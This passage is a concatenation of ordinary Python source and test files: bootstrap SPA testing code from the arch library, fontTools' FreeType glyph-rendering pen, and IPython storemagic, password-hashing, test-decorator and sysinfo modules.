raise ValueError(f"Unknown bootstrap: {bootstrap_name}")
self._seed = seed
self.bootstrap: CircularBlockBootstrap = bootstrap_inst
self._pvalues: Dict[str, float] = {}
self._simulated_vals: Optional[Float64Array] = None
self._selector = np.ones(self.k, dtype=np.bool_)
self._model = "SPA"
if self.studentize:
method = "bootstrap" if self.nested else "asymptotic"
else:
method = "none"
self._info = dict(
[
("studentization", method),
("bootstrap", str(self.bootstrap)),
("ID", hex(id(self))),
]
)
def reset(self) -> None:
"""
Reset the bootstrap to its initial state.
"""
super(SPA, self).reset()
self._pvalues = {}
def subset(self, selector: BoolArray) -> None:
"""
Sets a list of active models to run the SPA on. Primarily for
internal use.
Parameters
----------
selector : ndarray
Boolean array indicating which columns to use when computing the
p-values. This is primarily for use by StepM.
"""
self._selector = selector
def compute(self) -> None:
"""
Compute the bootstrap pvalue.
Notes
-----
Must be called before accessing the pvalue.
"""
# Plan
# 1. Compute variances
if self._simulated_vals is None:
self._simulate_values()
simulated_vals = self._simulated_vals
# Use subset if needed
assert simulated_vals is not None
simulated_vals = simulated_vals[self._selector, :, :]
max_simulated_vals = np.max(simulated_vals, 0)
loss_diff = self._loss_diff[:, self._selector]
max_loss_diff = np.max(loss_diff.mean(axis=0))
pvalues = (max_simulated_vals > max_loss_diff).mean(axis=0)
self._pvalues = dict(
[("lower", pvalues[0]), ("consistent", pvalues[1]), ("upper", pvalues[2])]
)
def _simulate_values(self) -> None:
self._compute_variance()
# 2. Compute invalid columns using criteria for consistent
self._valid_columns = self._check_column_validity()
# 3. Compute simulated values
# Upper always re-centers
upper_mean = self._loss_diff.mean(0)
consistent_mean = upper_mean.copy()
consistent_mean[np.logical_not(self._valid_columns)] = 0.0
lower_mean = upper_mean.copy()
# Lower does not re-center those that are worse
lower_mean[lower_mean < 0] = 0.0
means = [lower_mean, consistent_mean, upper_mean]
simulated_vals = np.zeros((self.k, self.reps, 3))
for i, bs_data in enumerate(self.bootstrap.bootstrap(self.reps)):
pos_arg, kw_arg = bs_data
loss_diff_star = pos_arg[0]
for j, mean in enumerate(means):
simulated_vals[:, i, j] = loss_diff_star.mean(0) - mean
self._simulated_vals = simulated_vals
def _compute_variance(self) -> None:
"""
Estimates the variance of the loss differentials
Returns
-------
var : ndarray
Array containing the variances of each loss differential
"""
ld = self._loss_diff
demeaned = ld - ld.mean(axis=0)
if self.nested:
# Use bootstrap to estimate variances
bs = self.bootstrap.clone(demeaned, seed=copy.deepcopy(self._seed))
means = bs.apply(lambda x: x.mean(0), reps=self.reps)
variances = self.t * means.var(axis=0)
else:
t = self.t
p = 1.0 / self.block_size
variances = np.sum(demeaned ** 2, 0) / t
for i in range(1, t):
kappa = ((1.0 - (i / t)) * ((1 - p) ** i)) + (
(i / t) * ((1 - p) ** (t - i))
)
variances += (
2 * kappa * np.sum(demeaned[: (t - i), :] * demeaned[i:, :], 0) / t
)
self._loss_diff_var = cast(np.ndarray, variances)
def _check_column_validity(self) -> BoolArray:
"""
Checks whether the loss from the model is too low relative to its mean
to be asymptotically relevant.
Returns
-------
valid : ndarray
Boolean array indicating columns relevant for consistent p-value
calculation
"""
t, variances = self.t, self._loss_diff_var
mean_loss_diff = self._loss_diff.mean(0)
threshold = -1.0 * np.sqrt((variances / t) * 2 * np.log(np.log(t)))
return mean_loss_diff >= threshold
@property
def pvalues(self) -> pd.Series:
"""
P-values corresponding to the lower, consistent and
upper p-values.
Returns
-------
pvals : Series
Three p-values corresponding to the lower bound, the consistent
estimator, and the upper bound.
"""
self._check_compute()
return pd.Series(list(self._pvalues.values()), index=list(self._pvalues.keys()))
def critical_values(self, pvalue: float = 0.05) -> pd.Series:
"""
Returns data-dependent critical values
Parameters
----------
pvalue : float, optional
P-value in (0,1) to use when computing the critical values.
Returns
-------
crit_vals : Series
Series containing critical values for the lower, consistent and
upper methodologies
"""
self._check_compute()
if not (0.0 < pvalue < 1.0):
raise ValueError("pvalue must be in (0,1)")
# Subset if needed
assert self._simulated_vals is not None
simulated_values = self._simulated_vals[self._selector, :, :]
max_simulated_values = np.max(simulated_values, axis=0)
crit_vals = np.percentile(max_simulated_values, 100.0 * (1 - pvalue), axis=0)
return pd.Series(crit_vals, index=list(self._pvalues.keys()))
def better_models(
self,
pvalue: float = 0.05,
pvalue_type: Literal["lower", "consistent", "upper"] = "consistent",
) -> Union[IntArray, List[Hashable]]:
"""
Returns set of models rejected as being equal-or-worse than the
benchmark
Parameters
----------
pvalue : float, optional
P-value in (0,1) to use when computing superior models
pvalue_type : str, optional
String in 'lower', 'consistent', or 'upper' indicating which
critical value to use.
Returns
-------
indices : list
List of column names or indices of the superior models. Column
names are returned if models is a DataFrame.
Notes
-----
List of superior models returned is always with respect to the initial
set of models, even when using subset().
"""
self._check_compute()
if pvalue_type not in self._pvalues:
raise ValueError("Unknown pvalue type")
crit_val = self.critical_values(pvalue=pvalue)[pvalue_type]
better_models = self._loss_diff.mean(0) > crit_val
better_models = np.logical_and(better_models, self._selector)
if isinstance(self.models, pd.DataFrame):
return list(self.models.columns[better_models])
else:
return np.argwhere(better_models).flatten()
def _check_compute(self) -> None:
if self._pvalues:
return
msg = "compute must be called before pvalues are available."
raise RuntimeError(msg)
class RealityCheck(SPA):
# Shallow clone of SPA
pass
```
#### File: arch/__future__/_utility.py
```python
import sys
from typing import Optional
import warnings
def check_reindex(reindex: Optional[bool]) -> bool:
default = False if "arch.__future__.reindexing" in sys.modules else True
if reindex is None:
if default:
warnings.warn(
"""
The default for reindex is True. After September 2021 this will change to
False. Set reindex to True or False to silence this message. Alternatively,
you can use the import comment
from arch.__future__ import reindexing
to globally set reindex to True and silence this warning.
""",
FutureWarning,
)
reindex = default
return reindex
```
#### File: tests/bootstrap/test_block_length.py
```python
import numpy as np
from numpy.testing import assert_allclose
import pandas as pd
from arch.bootstrap.base import optimal_block_length
def test_block_length():
rs = np.random.RandomState(0)
e = rs.standard_normal(10000 + 100)
y = e
for i in range(1, len(e)):
y[i] = 0.3 * y[i - 1] + e[i]
s = pd.Series(y[100:], name="x")
bl = optimal_block_length(s)
sb, cb = bl.loc["x"]
assert_allclose(sb, 13.635665, rtol=1e-4)
assert_allclose(cb, 15.60894, rtol=1e-4)
df = pd.DataFrame([s, s]).T
df.columns = ["x", "y"]
bl = optimal_block_length(df)
for idx in ("x", "y"):
sb, cb = bl.loc[idx]
assert_allclose(sb, 13.635665, rtol=1e-4)
assert_allclose(cb, 15.60894, rtol=1e-4)
assert tuple(bl.columns) == ("stationary", "circular")
assert tuple(bl.index) == ("x", "y")
bl = optimal_block_length(np.asarray(df))
assert tuple(bl.index) == (0, 1)
```
#### File: tests/utility/test_cov.py
```python
from arch.compat.statsmodels import dataset_loader
from numpy import diff, log
from numpy.random import RandomState
from numpy.testing import assert_almost_equal
import pytest
from statsmodels.datasets import macrodata
from arch.utility import cov_nw
class TestVarNW(object):
@classmethod
def setup_class(cls):
cls.rng = RandomState(12345)
cls.cpi = log(dataset_loader(macrodata)["cpi"])
cls.inflation = diff(cls.cpi)
def test_cov_nw(self):
y = self.inflation
simple_cov = cov_nw(y, lags=0)
e = y - y.mean()
assert_almost_equal(e.dot(e) / e.shape[0], simple_cov)
def test_cov_nw_ddof(self):
y = self.inflation
simple_cov = cov_nw(y, lags=0, ddof=1)
e = y - y.mean()
n = e.shape[0]
assert_almost_equal(e.dot(e) / (n - 1), simple_cov)
def test_cov_nw_no_demean(self):
y = self.inflation
simple_cov = cov_nw(y, lags=0, demean=False)
assert_almost_equal(y.dot(y) / y.shape[0], simple_cov)
def test_cov_nw_2d(self):
y = self.rng.randn(100, 2)
simple_cov = cov_nw(y, lags=0)
e = y - y.mean(0)
assert_almost_equal(e.T.dot(e) / e.shape[0], simple_cov)
def test_cov_nw_2d_2lags(self):
y = self.rng.randn(100, 2)
e = y - y.mean(0)
gamma_0 = e.T.dot(e)
gamma_1 = e[1:].T.dot(e[:-1])
gamma_2 = e[2:].T.dot(e[:-2])
w1, w2 = 1.0 - (1.0 / 3.0), 1.0 - (2.0 / 3.0)
expected = (
gamma_0 + w1 * (gamma_1 + gamma_1.T) + w2 * (gamma_2 + gamma_2.T)
) / 100.0
assert_almost_equal(cov_nw(y, lags=2), expected)
def test_cov_nw_axis(self):
y = self.rng.randn(100, 2)
e = y - y.mean(0)
gamma_0 = e.T.dot(e)
gamma_1 = e[1:].T.dot(e[:-1])
gamma_2 = e[2:].T.dot(e[:-2])
w1, w2 = 1.0 - (1.0 / 3.0), 1.0 - (2.0 / 3.0)
expected = (
gamma_0 + w1 * (gamma_1 + gamma_1.T) + w2 * (gamma_2 + gamma_2.T)
) / 100.0
assert_almost_equal(cov_nw(y.T, lags=2, axis=1), expected)
def test_errors(self):
y = self.rng.randn(100, 2)
with pytest.raises(ValueError):
cov_nw(y, 200)
with pytest.raises(ValueError):
cov_nw(y, axis=3)
with pytest.raises(ValueError):
cov_nw(y, ddof=200)
```
#### File: tests/utility/test_utility.py
```python
import pytest
from arch import utility
@pytest.mark.slow
@pytest.mark.parametrize("arg", [["--collect-only"], "--collect-only"])
def test_runner(arg):
utility.test(arg, exit=False)
```
#### File: arch/utility/testing.py
```python
from __future__ import annotations
from typing import Dict
from scipy.stats import chi2
from arch.vendor import cached_property
__all__ = ["WaldTestStatistic"]
class WaldTestStatistic(object):
"""
Test statistic holder for Wald-type tests
Parameters
----------
stat : float
The test statistic
df : int
Degree of freedom.
null : str
A statement of the test's null hypothesis
alternative : str
A statement of the test's alternative hypothesis
name : str, default "" (empty)
Name of test
"""
def __init__(
self,
stat: float,
df: int,
null: str,
alternative: str,
name: str = "",
) -> None:
self._stat = stat
self._null = null
self._alternative = alternative
self.df: int = df
self._name = name
self.dist = chi2(df)
self.dist_name: str = "chi2({0})".format(df)
@property
def stat(self) -> float:
"""Test statistic"""
return self._stat
@cached_property
def pval(self) -> float:
"""P-value of test statistic"""
return 1 - self.dist.cdf(self.stat)
@cached_property
def critical_values(self) -> Dict[str, float]:
"""Critical values test for common test sizes"""
return dict(zip(["10%", "5%", "1%"], self.dist.ppf([0.9, 0.95, 0.99])))
@property
def null(self) -> str:
"""Null hypothesis"""
return self._null
@property
def alternative(self) -> str:
return self._alternative
def __str__(self) -> str:
name = "" if not self._name else self._name + "\n"
msg = (
"{name}H0: {null}\n{name}H1: {alternative}\nStatistic: {stat:0.4f}\n"
"P-value: {pval:0.4f}\nDistributed: {dist}"
)
return msg.format(
name=name,
null=self.null,
alternative=self.alternative,
stat=self.stat,
pval=self.pval,
dist=self.dist_name,
)
def __repr__(self) -> str:
return (
self.__str__()
+ "\n"
+ self.__class__.__name__
+ ", id: {0}".format(hex(id(self)))
)
```
#### File: fontTools/pens/freetypePen.py
```python
__all__ = ['FreeTypePen']
import os
import ctypes
import platform
import subprocess
import collections
import math
import freetype
from freetype.raw import FT_Outline_Get_Bitmap, FT_Outline_Get_BBox, FT_Outline_Get_CBox
from freetype.ft_types import FT_Pos
from freetype.ft_structs import FT_Vector, FT_BBox, FT_Bitmap, FT_Outline
from freetype.ft_enums import FT_OUTLINE_NONE, FT_OUTLINE_EVEN_ODD_FILL, FT_PIXEL_MODE_GRAY
from freetype.ft_errors import FT_Exception
from fontTools.pens.basePen import BasePen
from fontTools.misc.roundTools import otRound
from fontTools.misc.transform import Transform
Contour = collections.namedtuple('Contour', ('points', 'tags'))
LINE = 0b00000001
CURVE = 0b00000011
OFFCURVE = 0b00000010
QCURVE = 0b00000001
QOFFCURVE = 0b00000000
class FreeTypePen(BasePen):
"""Pen to rasterize paths with FreeType. Requires `freetype-py` module.
Constructs ``FT_Outline`` from the paths, and renders it within a bitmap
buffer.
For ``array()`` and ``show()``, `numpy` and `matplotlib` must be installed.
For ``image()``, `Pillow` is required. Each module is lazily loaded when the
corresponding method is called.
Args:
glyphSet: a dictionary of drawable glyph objects keyed by name
used to resolve component references in composite glyphs.
:Examples:
If `numpy` and `matplotlib` is available, the following code will
show the glyph image of `fi` in a new window::
from fontTools.ttLib import TTFont
from fontTools.pens.freetypePen import FreeTypePen
from fontTools.misc.transform import Offset
pen = FreeTypePen(None)
font = TTFont('SourceSansPro-Regular.otf')
glyph = font.getGlyphSet()['fi']
glyph.draw(pen)
width, ascender, descender = glyph.width, font['OS/2'].usWinAscent, -font['OS/2'].usWinDescent
height = ascender - descender
pen.show(width=width, height=height, transform=Offset(0, -descender))
Combining with `uharfbuzz`, you can typeset a chunk of glyphs in a pen::
import uharfbuzz as hb
from fontTools.pens.freetypePen import FreeTypePen
from fontTools.pens.transformPen import TransformPen
from fontTools.misc.transform import Offset
en1, en2, ar, ja = 'Typesetting', 'Jeff', 'صف الحروف', 'たいぷせっと'
for text, font_path, direction, typo_ascender, typo_descender, vhea_ascender, vhea_descender, contain, features in (
(en1, 'NotoSans-Regular.ttf', 'ltr', 2189, -600, None, None, False, {"kern": True, "liga": True}),
(en2, 'NotoSans-Regular.ttf', 'ltr', 2189, -600, None, None, True, {"kern": True, "liga": True}),
(ar, 'NotoSansArabic-Regular.ttf', 'rtl', 1374, -738, None, None, False, {"kern": True, "liga": True}),
(ja, 'NotoSansJP-Regular.otf', 'ltr', 880, -120, 500, -500, False, {"palt": True, "kern": True}),
(ja, 'NotoSansJP-Regular.otf', 'ttb', 880, -120, 500, -500, False, {"vert": True, "vpal": True, "vkrn": True})
):
blob = hb.Blob.from_file_path(font_path)
face = hb.Face(blob)
font = hb.Font(face)
buf = hb.Buffer()
buf.direction = direction
buf.add_str(text)
buf.guess_segment_properties()
hb.shape(font, buf, features)
x, y = 0, 0
pen = FreeTypePen(None)
for info, pos in zip(buf.glyph_infos, buf.glyph_positions):
gid = info.codepoint
transformed = TransformPen(pen, Offset(x + pos.x_offset, y + pos.y_offset))
font.draw_glyph_with_pen(gid, transformed)
x += pos.x_advance
y += pos.y_advance
offset, width, height = None, None, None
if direction in ('ltr', 'rtl'):
offset = (0, -typo_descender)
width = x
height = typo_ascender - typo_descender
else:
offset = (-vhea_descender, -y)
width = vhea_ascender - vhea_descender
height = -y
pen.show(width=width, height=height, transform=Offset(*offset), contain=contain)
For Jupyter Notebook, the rendered image will be displayed in a cell if
you replace ``show()`` with ``image()`` in the examples.
"""
def __init__(self, glyphSet):
BasePen.__init__(self, glyphSet)
self.contours = []
def outline(self, transform=None, evenOdd=False):
"""Converts the current contours to ``FT_Outline``.
Args:
transform: A optional 6-tuple containing an affine transformation,
or a ``Transform`` object from the ``fontTools.misc.transform``
module.
evenOdd: Pass ``True`` for even-odd fill instead of non-zero.
"""
transform = transform or Transform()
if not hasattr(transform, 'transformPoint'):
transform = Transform(*transform)
nContours = len(self.contours)
n_points = sum((len(contour.points) for contour in self.contours))
points = []
for contour in self.contours:
for point in contour.points:
point = transform.transformPoint(point)
points.append(FT_Vector(FT_Pos(otRound(point[0] * 64)), FT_Pos(otRound(point[1] * 64))))
tags = []
for contour in self.contours:
for tag in contour.tags:
tags.append(tag)
contours = []
contours_sum = 0
for contour in self.contours:
contours_sum += len(contour.points)
contours.append(contours_sum - 1)
flags = FT_OUTLINE_EVEN_ODD_FILL if evenOdd else FT_OUTLINE_NONE
return FT_Outline(
(ctypes.c_short)(nContours),
(ctypes.c_short)(n_points),
(FT_Vector * n_points)(*points),
(ctypes.c_ubyte * n_points)(*tags),
(ctypes.c_short * nContours)(*contours),
(ctypes.c_int)(flags)
)
def buffer(self, width=None, height=None, transform=None, contain=False, evenOdd=False):
"""Renders the current contours within a bitmap buffer.
Args:
width: Image width of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
height: Image height of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
transform: A optional 6-tuple containing an affine transformation,
or a ``Transform`` object from the ``fontTools.misc.transform``
module. The bitmap size is not affected by this matrix.
contain: If ``True``, the image size will be automatically expanded
so that it fits to the bounding box of the paths. Useful for
rendering glyphs with negative sidebearings without clipping.
evenOdd: Pass ``True`` for even-odd fill instead of non-zero.
Returns:
A tuple of ``(buffer, size)``, where ``buffer`` is a ``bytes``
object of the resulted bitmap and ``size`` is a 2-tuple of its
dimension.
:Example:
.. code-block::
>> pen = FreeTypePen(None)
>> glyph.draw(pen)
>> buf, size = pen.buffer(width=500, height=1000)
>> type(buf), len(buf), size
(<class 'bytes'>, 500000, (500, 1000))
"""
transform = transform or Transform()
if not hasattr(transform, 'transformPoint'):
transform = Transform(*transform)
contain_x, contain_y = contain or width is None, contain or height is None
width, height = width or 0, height or 0
if contain_x or contain_y:
bbox = self.bbox
bbox = transform.transformPoints((bbox[0:2], bbox[2:4]))
bbox = (*bbox[0], *bbox[1])
bbox_size = bbox[2] - bbox[0], bbox[3] - bbox[1]
dx, dy = transform.dx, transform.dy
if contain_x:
dx = min(-dx, bbox[0]) * -1.0
width = max(width, bbox_size[0])
if contain_y:
dy = min(-dy, bbox[1]) * -1.0
height = max(height, bbox_size[1])
transform = Transform(*transform[:4], dx, dy)
width, height = math.ceil(width), math.ceil(height)
buf = ctypes.create_string_buffer(width * height)
bitmap = FT_Bitmap(
(ctypes.c_int)(height),
(ctypes.c_int)(width),
(ctypes.c_int)(width),
(ctypes.POINTER(ctypes.c_ubyte))(buf),
(ctypes.c_short)(256),
(ctypes.c_ubyte)(FT_PIXEL_MODE_GRAY),
(ctypes.c_char)(0),
(ctypes.c_void_p)(None)
)
outline = self.outline(transform=transform, evenOdd=evenOdd)
err = FT_Outline_Get_Bitmap(freetype.get_handle(), ctypes.byref(outline), ctypes.byref(bitmap))
if err != 0:
raise FT_Exception(err)
return buf.raw, (width, height)
def array(self, width=None, height=None, transform=None, contain=False, evenOdd=False):
"""Returns the rendered contours as a numpy array. Requires `numpy`.
Args:
width: Image width of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
height: Image height of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
transform: A optional 6-tuple containing an affine transformation,
or a ``Transform`` object from the ``fontTools.misc.transform``
module. The bitmap size is not affected by this matrix.
contain: If ``True``, the image size will be automatically expanded
so that it fits to the bounding box of the paths. Useful for
rendering glyphs with negative sidebearings without clipping.
evenOdd: Pass ``True`` for even-odd fill instead of non-zero.
Returns:
A ``numpy.ndarray`` object with a shape of ``(height, width)``.
Each element takes a value in the range of ``[0.0, 1.0]``.
:Example:
.. code-block::
>> pen = FreeTypePen(None)
>> glyph.draw(pen)
>> arr = pen.array(width=500, height=1000)
>> type(a), a.shape
(<class 'numpy.ndarray'>, (1000, 500))
"""
import numpy as np
buf, size = self.buffer(width=width, height=height, transform=transform, contain=contain, evenOdd=evenOdd)
return np.frombuffer(buf, 'B').reshape((size[1], size[0])) / 255.0
def show(self, width=None, height=None, transform=None, contain=False, evenOdd=False):
"""Plots the rendered contours with `pyplot`. Requires `numpy` and
`matplotlib`.
Args:
width: Image width of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
height: Image height of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
transform: A optional 6-tuple containing an affine transformation,
or a ``Transform`` object from the ``fontTools.misc.transform``
module. The bitmap size is not affected by this matrix.
contain: If ``True``, the image size will be automatically expanded
so that it fits to the bounding box of the paths. Useful for
rendering glyphs with negative sidebearings without clipping.
evenOdd: Pass ``True`` for even-odd fill instead of non-zero.
:Example:
.. code-block::
>> pen = FreeTypePen(None)
>> glyph.draw(pen)
>> pen.show(width=500, height=1000)
"""
from matplotlib import pyplot as plt
a = self.array(width=width, height=height, transform=transform, contain=contain, evenOdd=evenOdd)
plt.imshow(a, cmap='gray_r', vmin=0, vmax=1)
plt.show()
def image(self, width=None, height=None, transform=None, contain=False, evenOdd=False):
"""Returns the rendered contours as a PIL image. Requires `Pillow`.
Can be used to display a glyph image in Jupyter Notebook.
Args:
width: Image width of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
height: Image height of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
transform: A optional 6-tuple containing an affine transformation,
or a ``Transform`` object from the ``fontTools.misc.transform``
module. The bitmap size is not affected by this matrix.
contain: If ``True``, the image size will be automatically expanded
so that it fits to the bounding box of the paths. Useful for
rendering glyphs with negative sidebearings without clipping.
evenOdd: Pass ``True`` for even-odd fill instead of non-zero.
Returns:
A ``PIL.image`` object. The image is filled in black with alpha
channel obtained from the rendered bitmap.
:Example:
.. code-block::
>> pen = FreeTypePen(None)
>> glyph.draw(pen)
>> img = pen.image(width=500, height=1000)
>> type(img), img.size
(<class 'PIL.Image.Image'>, (500, 1000))
"""
from PIL import Image
buf, size = self.buffer(width=width, height=height, transform=transform, contain=contain, evenOdd=evenOdd)
img = Image.new('L', size, 0)
img.putalpha(Image.frombuffer('L', size, buf))
return img
@property
def bbox(self):
"""Computes the exact bounding box of an outline.
Returns:
A tuple of ``(xMin, yMin, xMax, yMax)``.
"""
bbox = FT_BBox()
outline = self.outline()
FT_Outline_Get_BBox(ctypes.byref(outline), ctypes.byref(bbox))
return (bbox.xMin / 64.0, bbox.yMin / 64.0, bbox.xMax / 64.0, bbox.yMax / 64.0)
@property
def cbox(self):
"""Returns an outline's ‘control box’.
Returns:
A tuple of ``(xMin, yMin, xMax, yMax)``.
"""
cbox = FT_BBox()
outline = self.outline()
FT_Outline_Get_CBox(ctypes.byref(outline), ctypes.byref(cbox))
return (cbox.xMin / 64.0, cbox.yMin / 64.0, cbox.xMax / 64.0, cbox.yMax / 64.0)
def _moveTo(self, pt):
contour = Contour([], [])
self.contours.append(contour)
contour.points.append(pt)
contour.tags.append(LINE)
def _lineTo(self, pt):
contour = self.contours[-1]
contour.points.append(pt)
contour.tags.append(LINE)
def _curveToOne(self, p1, p2, p3):
t1, t2, t3 = OFFCURVE, OFFCURVE, CURVE
contour = self.contours[-1]
for p, t in ((p1, t1), (p2, t2), (p3, t3)):
contour.points.append(p)
contour.tags.append(t)
def _qCurveToOne(self, p1, p2):
t1, t2 = QOFFCURVE, QCURVE
contour = self.contours[-1]
for p, t in ((p1, t1), (p2, t2)):
contour.points.append(p)
contour.tags.append(t)
```
#### File: extensions/tests/test_storemagic.py
```python
import tempfile, os
from pathlib import Path
from traitlets.config.loader import Config
def setup_module():
ip.magic('load_ext storemagic')
def test_store_restore():
assert 'bar' not in ip.user_ns, "Error: some other test leaked `bar` in user_ns"
assert 'foo' not in ip.user_ns, "Error: some other test leaked `foo` in user_ns"
assert 'foobar' not in ip.user_ns, "Error: some other test leaked `foobar` in user_ns"
assert 'foobaz' not in ip.user_ns, "Error: some other test leaked `foobaz` in user_ns"
ip.user_ns['foo'] = 78
ip.magic('alias bar echo "hello"')
ip.user_ns['foobar'] = 79
ip.user_ns['foobaz'] = '80'
tmpd = tempfile.mkdtemp()
ip.magic('cd ' + tmpd)
ip.magic('store foo')
ip.magic('store bar')
ip.magic('store foobar foobaz')
# Check storing
assert ip.db["autorestore/foo"] == 78
assert "bar" in ip.db["stored_aliases"]
assert ip.db["autorestore/foobar"] == 79
assert ip.db["autorestore/foobaz"] == "80"
# Remove those items
ip.user_ns.pop('foo', None)
ip.user_ns.pop('foobar', None)
ip.user_ns.pop('foobaz', None)
ip.alias_manager.undefine_alias('bar')
ip.magic('cd -')
ip.user_ns['_dh'][:] = []
# Check restoring
ip.magic("store -r foo bar foobar foobaz")
assert ip.user_ns["foo"] == 78
assert ip.alias_manager.is_alias("bar")
assert ip.user_ns["foobar"] == 79
assert ip.user_ns["foobaz"] == "80"
ip.magic("store -r") # restores _dh too
assert any(Path(tmpd).samefile(p) for p in ip.user_ns["_dh"])
os.rmdir(tmpd)
def test_autorestore():
ip.user_ns['foo'] = 95
ip.magic('store foo')
del ip.user_ns['foo']
c = Config()
c.StoreMagics.autorestore = False
orig_config = ip.config
try:
ip.config = c
ip.extension_manager.reload_extension("storemagic")
assert "foo" not in ip.user_ns
c.StoreMagics.autorestore = True
ip.extension_manager.reload_extension("storemagic")
assert ip.user_ns["foo"] == 95
finally:
ip.config = orig_config
```
#### File: lib/tests/test_security.py
```python
from IPython.lib import passwd
from IPython.lib.security import passwd_check, salt_len
def test_passwd_structure():
p = passwd("passphrase")
algorithm, salt, hashed = p.split(":")
assert algorithm == "sha1"
assert len(salt) == salt_len
assert len(hashed) == 40
def test_roundtrip():
p = passwd("passphrase")
assert passwd_check(p, "passphrase") is True
def test_bad():
p = passwd('passphrase')
assert passwd_check(p, p) is False
assert passwd_check(p, "a:b:c:d") is False
assert passwd_check(p, "a:b") is False
def test_passwd_check_unicode():
# GH issue #4524
phash = u'sha1:23862bc21dd3:7a415a95ae4580582e314072143d9c382c491e4f'
assert passwd_check(phash, u"łe¶ŧ←↓→")
```
#### File: IPython/testing/decorators.py
```python
import os
import shutil
import sys
import tempfile
import unittest
import warnings
from importlib import import_module
from decorator import decorator
# Expose the unittest-driven decorators
from .ipunittest import ipdoctest, ipdocstring
#-----------------------------------------------------------------------------
# Classes and functions
#-----------------------------------------------------------------------------
# Simple example of the basic idea
def as_unittest(func):
"""Decorator to make a simple function into a normal test via unittest."""
class Tester(unittest.TestCase):
def test(self):
func()
Tester.__name__ = func.__name__
return Tester
# Utility functions
def skipif(skip_condition, msg=None):
"""Make function raise SkipTest exception if skip_condition is true
Parameters
----------
skip_condition : bool or callable
Flag to determine whether to skip test. If the condition is a
callable, it is used at runtime to dynamically make the decision. This
is useful for tests that may require costly imports, to delay the cost
until the test suite is actually executed.
msg : string
Message to give on raising a SkipTest exception.
Returns
-------
decorator : function
Decorator, which, when applied to a function, causes SkipTest
to be raised when the skip_condition was True, and the function
to be called normally otherwise.
"""
if msg is None:
msg = "Test skipped due to test condition."
import pytest
assert isinstance(skip_condition, bool)
return pytest.mark.skipif(skip_condition, reason=msg)
# A version with the condition set to true, common case just to attach a message
# to a skip decorator
def skip(msg=None):
"""Decorator factory - mark a test function for skipping from test suite.
Parameters
----------
msg : string
Optional message to be added.
Returns
-------
decorator : function
Decorator, which, when applied to a function, causes SkipTest
to be raised, with the optional message added.
"""
if msg and not isinstance(msg, str):
raise ValueError('invalid object passed to `@skip` decorator, did you '
'meant `@skip()` with brackets ?')
return skipif(True, msg)
def onlyif(condition, msg):
"""The reverse from skipif, see skipif for details."""
return skipif(not condition, msg)
#-----------------------------------------------------------------------------
# Utility functions for decorators
def module_not_available(module):
"""Can module be imported? Returns true if module does NOT import.
This is used to make a decorator to skip tests that require module to be
available, but delay the 'import numpy' to test execution time.
"""
try:
mod = import_module(module)
mod_not_avail = False
except ImportError:
mod_not_avail = True
return mod_not_avail
#-----------------------------------------------------------------------------
# Decorators for public use
# Decorators to skip certain tests on specific platforms.
skip_win32 = skipif(sys.platform == 'win32',
"This test does not run under Windows")
skip_linux = skipif(sys.platform.startswith('linux'),
"This test does not run under Linux")
skip_osx = skipif(sys.platform == 'darwin',"This test does not run under OS X")
# Decorators to skip tests if not on specific platforms.
skip_if_not_win32 = skipif(sys.platform != 'win32',
"This test only runs under Windows")
skip_if_not_linux = skipif(not sys.platform.startswith('linux'),
"This test only runs under Linux")
_x11_skip_cond = (sys.platform not in ('darwin', 'win32') and
os.environ.get('DISPLAY', '') == '')
_x11_skip_msg = "Skipped under *nix when X11/XOrg not available"
skip_if_no_x11 = skipif(_x11_skip_cond, _x11_skip_msg)
# Other skip decorators
# generic skip without module
skip_without = lambda mod: skipif(module_not_available(mod), "This test requires %s" % mod)
skipif_not_numpy = skip_without('numpy')
skipif_not_matplotlib = skip_without('matplotlib')
# A null 'decorator', useful to make more readable code that needs to pick
# between different decorators based on OS or other conditions
null_deco = lambda f: f
# Some tests only run where we can use unicode paths. Note that we can't just
# check os.path.supports_unicode_filenames, which is always False on Linux.
try:
f = tempfile.NamedTemporaryFile(prefix=u"tmp€")
except UnicodeEncodeError:
unicode_paths = False
else:
unicode_paths = True
f.close()
onlyif_unicode_paths = onlyif(unicode_paths, ("This test is only applicable "
"where we can use unicode in filenames."))
def onlyif_cmds_exist(*commands):
"""
Decorator to skip test when at least one of `commands` is not found.
"""
assert (
os.environ.get("IPTEST_WORKING_DIR", None) is None
), "iptest deprecated since IPython 8.0"
for cmd in commands:
reason = f"This test runs only if command '{cmd}' is installed"
if not shutil.which(cmd):
import pytest
return pytest.mark.skip(reason=reason)
return null_deco
```
#### File: testing/plugin/simple.py
```python
def pyfunc():
"""Some pure python tests...
>>> pyfunc()
'pyfunc'
>>> import os
>>> 2+3
5
>>> for i in range(3):
... print(i, end=' ')
... print(i+1, end=' ')
...
0 1 1 2 2 3
"""
return 'pyfunc'
def ipyfunc():
"""Some IPython tests...
In [1]: ipyfunc()
Out[1]: 'ipyfunc'
In [2]: import os
In [3]: 2+3
Out[3]: 5
In [4]: for i in range(3):
...: print(i, end=' ')
...: print(i+1, end=' ')
...:
Out[4]: 0 1 1 2 2 3
"""
return "ipyfunc"
```
#### File: IPython/utils/sysinfo.py
```python
import os
import platform
import pprint
import sys
import subprocess
from IPython.core import release
from IPython.utils import _sysinfo, encoding
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
def pkg_commit_hash(pkg_path):
"""Get short form of commit hash given directory `pkg_path`
We get the commit hash from (in order of preference):
* IPython.utils._sysinfo.commit
* git output, if we are in a git repository
If these fail, we return a not-found placeholder tuple
Parameters
----------
pkg_path : str
directory containing package
only used for getting commit from active repo
Returns
-------
hash_from : str
Where we got the hash from - description
hash_str : str
short form of hash
"""
# Try and get commit from written commit text file
if _sysinfo.commit:
return "installation", _sysinfo.commit
# maybe we are in a repository
proc = subprocess.Popen('git rev-parse --short HEAD'.split(' '),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=pkg_path)
repo_commit, _ = proc.communicate()
if repo_commit:
return 'repository', repo_commit.strip().decode('ascii')
return '(none found)', '<not found>'
def pkg_info(pkg_path):
"""Return dict describing the context of this package
Parameters
